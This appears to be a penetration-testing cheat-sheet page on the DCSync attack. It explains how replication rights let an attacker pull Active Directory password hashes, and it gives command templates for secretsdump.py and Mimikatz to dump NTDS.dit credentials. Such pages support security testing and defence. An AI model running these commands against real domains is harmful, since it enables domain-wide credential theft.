# DCSync ## DCSync DCSync is an attack that allows attackers to simulate a new Domain Controller on the domain to replicate sensitive information such as password hashes from the NTDS.dit file. {% hint style="info" %} An account on the target domain with *Replicate Directory Changes* rights is required in order to attempt a DC Sync attack. By default, domain administrators, enterprise administrators, and domain controllers have *Replicate Directory Changes* rights. However, I've run into cases where non-privileged accounts are accidentally given these rights. {% endhint %} This attack relies on the Microsoft Directory Replication Service (DRSUAPI), which uses the Directory Replication Service Remote (MS-DRSR) protocol to replicate from Domain Controllers. The attacker uses the *DSGetNCChanges* function in DRSUAPI to request information about AD Objects from a legitimate Domain Controller, and the legitimate Domain Controller responds with a structure that contains replication information, such as usernames and password hashes. ## Exploit {% tabs %} {% tab title="secretsdump.py" %} {% code title="Linux" %} ```fish secretsdump.py [domain/username]<:password> OPTIONS -just-dc Extract Only NTDS.dit Data (NTLM/Kerberos Keys) -just-dc-ntlm Extract Only NTDS.dit Data (NTLM Only) -just-dc-user [username] Extract Only NTDS.dit Data For Specified User -user-status Display If The User Is Disabled -history Dump Password History -outputfile Base Output Filename -hashes Authenticate Using LMHASH:NTHASH -k Use Kerberos Auth From ccache File ``` {% endcode %} {% endtab %} {% tab title="Mimikatz" %} {% code title="Linux" %} ```powershell lsadump::dcsync OPTIONS /domain:[domain] Domain /user:[user] Target Domain User To Obtain Credentials For /dc:[DC FDQN] Domain Controller To Target ``` {% endcode %} {% endtab %} {% endtabs %}